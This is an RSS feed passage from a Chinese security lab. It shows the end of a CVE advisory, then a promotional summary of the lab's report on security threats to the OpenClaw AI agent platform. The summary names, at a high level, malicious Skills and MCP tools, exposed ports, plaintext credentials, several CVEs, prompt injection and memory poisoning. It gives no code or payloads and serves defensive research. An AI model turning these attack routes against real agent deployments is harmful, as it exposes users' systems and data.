0px;"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://ubuntu.com/security/CVE-2026-31431" target="_blank">https://ubuntu.com/security/CVE-2026-31431</a></span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Red Hat 安全公告：</span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://access.redhat.com/security/cve/cve-2026-31431" target="_blank">https://access.redhat.com/security/cve/cve-2026-31431</a></span></span></p><p style="margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Debian 安全公告：</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://security-tracker.debian.org/tracker/CVE-2026-31431" target="_blank">https://security-tracker.debian.org/tracker/CVE-2026-31431</a></span></span></p><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x06 声明</span></span></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span leaf="">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。</span></p><div style="white-space: normal;margin-bottom: 0px;"><div style="margin: 30px 0% 10px;"><div style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><div style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;"><span leaf="">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span></span></p></div></div></div></div><div style="margin-bottom: 0px;"><div><div style="text-align: center;margin: 30px 0% 10px;"><div style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><div><div style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.06041666666666667" data-type="png" data-w="480" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-imgfileid="100013023" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></div></div><div><div style="margin: 10px 0%;"><div style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><div><div style="margin-top: 10px;margin-bottom: 10px;"><p style="vertical-align: middle;display: inline-block;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-type="jpeg" data-w="344" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-imgfileid="100013022" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: 61.8%;"><div><div><div style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">天融信</span></span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">阿尔法实验室</span></span></p></div></div></div><div><div style="margin: 10px 0%;"><div style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><div><div style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;"><span leaf="">长按二维码关注我们</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=64ba205b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496705%26idx%3D2%26sn%3D2f53fc8a4a3695c13f1ea7fc09bb1b9c">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Apr 2026 18:12:00 +0800</pubDate>
    </item>
    <item>
      <title>天融信：OpenClaw运行机制与安全威胁研究报告（附下载）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496695&amp;idx=1&amp;sn=1b64600108d07907afda1cdcdd5384e1</link>
      <description>OpenClaw既是AI Agent生态繁荣的典型代表，也是当前智能体安全风险的集中样本。</description>
      <content:encoded><![CDATA[<p><span>阿尔法实验室</span> <span>2026-03-13 19:15</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=94b831cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FTWq54w4h0qRzkdKvmk3lgSaw3RkjdBQQkD4Id6jb7fRv0V2JH5y24r8usO7kRp8C90Q5XMP1HTmzXfuM2fMrRkKrUsTicZznHFqBnanqQToo%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>OpenClaw既是AI Agent生态繁荣的典型代表，也是当前智能体安全风险的集中样本。</p>
  <p style="text-align: center;margin-bottom: 0px;font-size: 17px;line-height: 1.6;visibility: visible;" mp-original-font-size="17" mp-original-line-height="1.5999999999999999" data-mpa-powered-by="yiban.io"><span leaf="" style="visibility: visible;"><img data-aistatus="1" class="rich_pages wxw-img __bg_gif" data-ratio="0.18518518518518517" data-w="1080" style="width:100%;" data-backw="578" data-backh="107" src="https://wechat2rss.xlab.app/img-proxy/?k=b2a6489c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FnJmicCz2NYxNibMqIOfXMnZxbVBPBGKu3pficMjqFslyVdhUYhSozJ0egjyKoezIaK9qEyYy6ttzMv3T5Kiasiae7icg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg%26wxfrom%3D5%26wx_lazy%3D1%26tp%3Dwebp%23imgIndex%3D0"/></span></p><div style="font-size: 15px;color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;visibility: visible;" data-pm-slice="0 0 []"><div style="box-sizing: border-box;visibility: visible;"><div style="font-size: 15px;color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;visibility: visible;" data-pm-slice="0 0 []"><div style="box-sizing: border-box;visibility: visible;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;visibility: visible;"><span leaf="" style="visibility: visible;">OpenClaw是2025年末开源、2026年初在GitHub上爆炸式走红的本地优先（Local‑First）AI智能体（Agent）与自动化平台，由开发者Peter Steinberger发起，短短数月即累计二十多万Star，成为GitHub史上增长最快的开源项目之一。它的核心理念是让大模型从“对话式顾问”变成“真正能在本地动手干活的数字员工”，通过深度控制操作系统、调用外部工具和在线服务，自动执行复杂任务。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;visibility: visible;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;box-sizing: border-box;visibility: visible;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-backh="289" data-backw="578" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/dSWSuPicfjTccep9OxQ90OD607MrJGSRvVZ1IwRLlb3dwZicWct822zjDqT7JURYkojeLRjc2w9tdO8fVe6oicNZ3gNdndpltJHbicNte1iapP4M/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="334" data-imgfileid="503502698" data-ratio="0.49907407407407406" data-s="300,640" style="vertical-align:middle;max-width:100%;width:100%;box-sizing:border-box;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9c5153f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FdSWSuPicfjTccep9OxQ90OD607MrJGSRvVZ1IwRLlb3dwZicWct822zjDqT7JURYkojeLRjc2w9tdO8fVe6oicNZ3gNdndpltJHbicNte1iapP4M%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%23imgIndex%3D1"/></p></div><div style="box-sizing: border-box;visibility: visible;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;visibility: visible;"><span leaf="" style="visibility: visible;">OpenClaw因图标是红色龙虾，被广泛昵称为“龙虾”或“小龙虾”，同时受到产业界和广大用户广泛关注并积极实践应用，引发关于“养龙虾是否安全”的广泛讨论。工业和信息化部网络安全威胁和漏洞信息共享平台（NVDB）已发布专门预警，提示OpenClaw在不安全部署方式下存在较高安全风险，容易引发网络攻击和信息泄露。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在此背景下，天融信正式发布《OpenClaw运行机制与安全威胁研究》报告，从体系结构与运行机理出发，系统梳理OpenClaw的工作流程、Skill机制与大模型交互特点，并对其已披露漏洞和系统性安全威胁进行分析，为后续防护与治理提供技术依据。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="vertical-align: middle;display: inline-block;width: 60%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_img_placeholder wx_img_placeholder" data-ratio="1.412962962962963" data-s="300,640" data-type="png" data-w="1080" style="vertical-align:middle;max-width:100%;width:100%;box-sizing:border-box;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/dSWSuPicfjTd2QGYvlHRxWh5r6wmdCahBsw7xibyrWA7gSSjySaRthO3kIJkhYazuVzaYl32EJ12n5lqyS7k2SeicIbYu36OcDNmIFP5wIKibE8/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="347" data-cropsely2="486" data-backw="347" data-backh="490" data-imgfileid="503502862" src="https://wechat2rss.xlab.app/img-proxy/?k=fdb97dad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FdSWSuPicfjTd2QGYvlHRxWh5r6wmdCahBsw7xibyrWA7gSSjySaRthO3kIJkhYazuVzaYl32EJ12n5lqyS7k2SeicIbYu36OcDNmIFP5wIKibE8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%23imgIndex%3D2"/></p></div><div style="text-align: center;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">关注“天融信”</span></strong></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">私信回复“</span><span style="color: rgb(192, 0, 0);box-sizing: border-box;"><span leaf="">OpenClaw研究报告</span></span><span leaf="">”</span></strong></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">即可获取完整报告</span></strong></p></div><div style="color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;" data-pm-slice="0 0 []"><div style="margin: 0.5em 0px;text-align: left;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;height: 2em;line-height: 2em;background-color: rgb(192, 0, 0);color: rgb(255, 255, 255);padding: 0px 8px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">OpenClaw</span><span leaf="">的运行流程</span></strong></p></div></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">整体来看，OpenClaw以“本地常驻、模块化扩展、闭环执行”为核心特征，从消息接入、决策规划、工具执行到记忆沉淀形成完整链路。各模块分工明确、协同运转，使其区别于传统对话式AI，成为能够长期运行、自主完成复杂任务的通用Agent基础设施。</span></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;width: 100%;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_img_placeholder wx_img_placeholder" data-ratio="0.562962962962963" data-s="300,640" data-type="png" data-w="1080" style="vertical-align:middle;max-width:100%;width:100%;box-sizing:border-box;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/dSWSuPicfjTcoOib4PgfAF4xMdicPAZictDzfKT1hAaZwyNcVjsOhYJDa5wTZyBTOKB3QvnIyvQMLfA7DqibVbUGT1CS3UaJeNyMVY8aYia8Uee6s/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="315" data-backw="578" data-backh="325" data-imgfileid="503502695" src="https://wechat2rss.xlab.app/img-proxy/?k=4675cefe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FdSWSuPicfjTcoOib4PgfAF4xMdicPAZictDzfKT1hAaZwyNcVjsOhYJDa5wTZyBTOKB3QvnIyvQMLfA7DqibVbUGT1CS3UaJeNyMVY8aYia8Uee6s%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%23imgIndex%3D3"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 0px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;padding: 0px 20px;border-left: 1px dashed rgb(192, 0, 0);border-bottom-left-radius: 0px;z-index: 0;box-sizing: border-box;"><div style="margin: -6px 0px 12px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(89, 87, 87);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(192, 0, 0);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Skill机制与社区生态：</span></strong></span><span leaf="">OpenClaw将Skills视为扩展Agent能力的核心机制，与其说Skill是一个简单的“提示词模板”，不如说它是“带结构化元数据、能驱动工具和脚本的任务模块”。</span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 0px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;padding: 0px 20px;border-left: 1px dashed rgb(192, 0, 0);border-bottom-left-radius: 0px;z-index: 0;box-sizing: border-box;"><div style="margin: -6px 0px 12px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(89, 87, 87);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(192, 0, 0);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">默认“完全掌控电脑”的权限模型：</span></strong></span><span leaf="">OpenClaw的一大特点是“真正能动手干活”，这在技术上意味着，如果按照常见教程全开工具而不做隔离或限制，就能几乎实现完整系统访问——可以读写文件系统、执行终端命令、控制浏览器、访问邮件和日历、调用SSH或云端API等。</span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 0px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;padding: 0px 20px;border-left: 1px dashed rgb(192, 0, 0);border-bottom-left-radius: 0px;z-index: 0;box-sizing: border-box;"><div style="margin: -6px 0px 12px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(89, 87, 87);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(192, 0, 0);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">本地模型与云端模型支持：</span></strong></span><span leaf="">OpenClaw的模型编排层支持接入多种云端大模型（如OpenAI GPT系列、Anthropic Claude、Google Gemini等）以及本地部署的开源模型（如通过Ollama或本地推理服务运行的Llama系列），用户可以在配置中选择首选模型和备选模型，并为不同任务设置不同的模型策略。</span></p></div></div></div></div><div style="color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;" data-pm-slice="0 0 []"><div style="margin: 0.5em 0px;text-align: left;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;height: 2em;line-height: 2em;background-color: rgb(192, 0, 0);color: rgb(255, 255, 255);padding: 0px 8px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">OpenClaw面临的主要安全威胁</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">依托架构特性与生态现状，OpenClaw面临多层级、多维度的安全风险，覆盖技能供应链、部署配置、框架漏洞、模型交互等关键环节。这些风险相互叠加，构成了当前智能体落地中最典型的安全挑战。</span></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 0px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;padding: 0px 20px;border-left: 1px dashed rgb(192, 0, 0);border-bottom-left-radius: 0px;z-index: 0;box-sizing: border-box;"><div style="margin: -6px 0px 12px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(89, 87, 87);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="color: rgb(192, 0, 0);font-weight: bold;">供应链安全：</span>OpenClaw的能力高度依赖外部Skill与远程MCP工具，这使其天然暴露在供应链攻击面上。如果Skill或MCP工具被植入恶意代码或恶意提示词，Agent在毫无察觉的情况下就可能执行攻击者预置的行为。</span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 0px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;padding: 0px 20px;border-left: 1px dashed rgb(192, 0, 0);border-bottom-left-radius: 0px;z-index: 0;box-sizing: border-box;"><div style="margin: -6px 0px 12px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(89, 87, 87);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="color: rgb(192, 0, 0);font-weight: bold;">OpenClaw自身安全配置与运维风险：</span>除供应链问题外，OpenClaw自身的配置习惯和不安全部署方式也是当前攻击的重灾区。从下载不明来源的安装脚本，到将管理端口直接暴露在公网，加上Agent的特权运行、明文凭证存储等等，这些风险为攻击者敞开了大门。此外，由于Agent与大模型交互的黑盒特性，用户难以察觉到数据如何被调用和泄露。</span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 0px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;padding: 0px 20px;border-left: 1px dashed rgb(192, 0, 0);border-bottom-left-radius: 0px;z-index: 0;box-sizing: border-box;"><div style="margin: -6px 0px 12px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(89, 87, 87);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="color: rgb(192, 0, 0);font-weight: bold;">大量已被披露的框架漏洞：</span>在2026年初集中暴露出一组高危漏洞，其中以CVE‑2026‑25253、CVE‑2026‑24763和CVE-2026-25593为代表，叠加不安全默认配置，构成了极具破坏力的攻击链。</span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 0px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;padding: 0px 20px;border-left: 1px dashed rgb(192, 0, 0);border-bottom-left-radius: 0px;z-index: 0;box-sizing: border-box;"><div style="margin: -6px 0px 12px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(89, 87, 87);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="color: rgb(192, 0, 0);font-weight: bold;">OpenClaw与大模型交互相关的安全威胁：</span>由于OpenClaw的“决策大脑”依赖大语言模型，其安全性也不可避免地受到LLM相关攻击面的影响，包括：提示词注入、记忆投毒、模型幻觉与越权执行等。</span></p></div></div></div></div><div style="color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;" data-pm-slice="0 0 []"><div style="margin: 0.5em 0px;text-align: left;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;height: 2em;line-height: 2em;background-color: rgb(192, 0, 0);color: rgb(255, 255, 255);padding: 0px 8px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">OpenClaw</span><span leaf="">安全上岗指南</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenClaw既是AI Agent生态繁荣的典型代表，也是当前智能体安全风险的集中样本。其以本地优先、自托管、多渠道集成和Skill插件生态为特征，让普通用户和开发者第一次可以较低门槛地拥有“真正能动手”的个人智能体，这也是其在全球范围内迅速走红的原因之一。然而，正是这种深度系统权限与高度可扩展性，使其在多个维度上都呈现出前所未有的攻击面。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近日，针对“龙虾”典型应用场景下的安全风险，</span><span leaf="">工业和信息化部网络安全威胁和漏洞信息共享平台（NVDB）</span><span leaf="">组织智能体提供商、漏洞收集平台运营单位、网络安全企业等，研究提出<a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzA3OTMxNTcxNA==&amp;mid=2650986319&amp;idx=2&amp;sn=b872b32d10d13fe3f62edc8963cbffa6&amp;scene=21#wechat_redirect" textvalue="“六要六不要”建议" data-itemshowtype="0" linktype="text" data-linktype="2">“六要六不要”建议</a>。面对全新安全挑战，天融信从平台加固到使用规范，从模型与数据防护到常态化风险体检，提供五层安全能力，层层递进、环环相扣，全面覆盖OpenClaw全场景风险，帮助企业的“小龙虾”安全上岗。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;width: 100%;box-sizing: border-box;"><a href="https://mp.weixin.qq.com/s?__biz=MzA3OTMxNTcxNA==&amp;mid=2650986224&amp;idx=1&amp;sn=f7397f2d3bab30a0aa03ba8fcd81180e&amp;scene=21#wechat_redirect" imgurl="https://mmbiz.qpic.cn/mmbiz_png/dSWSuPicfjTeAqicxN8FkCEBsM0mN7ian7UK8AePG6rqambopZkrynBgUScbs9JqIqfoVFDQqKv3Wh62GkfTcc6pSVXyjGp42Se4OSsLxwKfZA/640?wx_fmt=png&amp;from=appmsg#imgIndex=4" linktype="image" tab="innerlink" data-itemshowtype="0" target="_blank" data-linktype="1"><span style="width:100%;" class="js_jump_icon h5_image_link"><img data-aistatus="1" class="rich_pages wxw-img js_img_placeholder wx_img_placeholder" data-ratio="0.42314814814814816" data-s="300,640" data-type="png" data-w="1080" style="vertical-align:middle;max-width:100%;width:100%;box-sizing:border-box;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/dSWSuPicfjTeAqicxN8FkCEBsM0mN7ian7UK8AePG6rqambopZkrynBgUScbs9JqIqfoVFDQqKv3Wh62GkfTcc6pSVXyjGp42Se4OSsLxwKfZA/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="244" data-backw="578" data-backh="245" data-imgfileid="503502866" src="https://wechat2rss.xlab.app/img-proxy/?k=d731afc3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FdSWSuPicfjTeAqicxN8FkCEBsM0mN7ian7UK8AePG6rqambopZkrynBgUScbs9JqIqfoVFDQqKv3Wh62GkfTcc6pSVXyjGp42Se4OSsLxwKfZA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%23imgIndex%3D4"/></span></a></p></div><div style="text-align: center;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击图片查看更多详情</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="vertical-align: middle;display: inline-block;width: 18%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_img_placeholder wx_img_placeholder" data-ratio="0.8302618816682832" data-s="300,640" data-type="png" data-w="1031" style="vertical-align:middle;max-width:100%;width:100%;box-sizing:border-box;" data-backw="104" data-backh="86" data-imgfileid="503502686" src="https://wechat2rss.xlab.app/img-proxy/?k=c2dbab3a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FdSWSuPicfjTdTbukDlPVZiaZ7tibB68BzYmRqZnJMfMicppI4xMxYJIJtAdErh43lvDToIv9plib5AkD3LWGRwgkqQIHHvIHFbVicZ8v2pSrqILec%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%23imgIndex%3D5"/></p></div><div style="box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在可预见的未来，随着Skill数量和部署规模的继续增长，OpenClaw及类似智能体平台将长期处在“能力跃升与安全焦虑并存”的状态。只有通过规范化的权限管理、严格的技能生态治理、持续的漏洞修复与安全审计，以及对大模型交互风险的系统性防范，才能在充分释放OpenClaw生产力潜能的同时，将由此带来的安全风险控制在可接受范围内。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="margin: 0px;line-height: 0;transform: rotateY(180deg);-webkit-transform: rotateY(180deg);-moz-transform: rotateY(180deg);-o-transform: rotateY(180deg);box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;width: 45px;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img wx_img_placeholder_mini" data-ratio="0.32037037037037036" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="503502684" src="https://wechat2rss.xlab.app/img-proxy/?k=025bcb7e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FdSWSuPicfjTeVnypcdSnT2QK9LLRKj4b6wkZqfzicqFYCR5PtHzemibovjHsOSiaAIiaJkWvdxrLm0QRhyPof2hIHI7vdXrMqmlKdStb1S0DhIPQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%23imgIndex%3D6"/></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;padding: 0px 10px;box-sizing: border-box;"><div style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">关注“天融信”</span></strong></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">私信回复“</span><span style="color: rgb(192, 0, 0);box-sizing: border-box;"><span leaf="">OpenClaw研究报告</span></span><span leaf="">”</span></strong></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">即可获取完整报告</span></strong></p></div></div><div style="display: 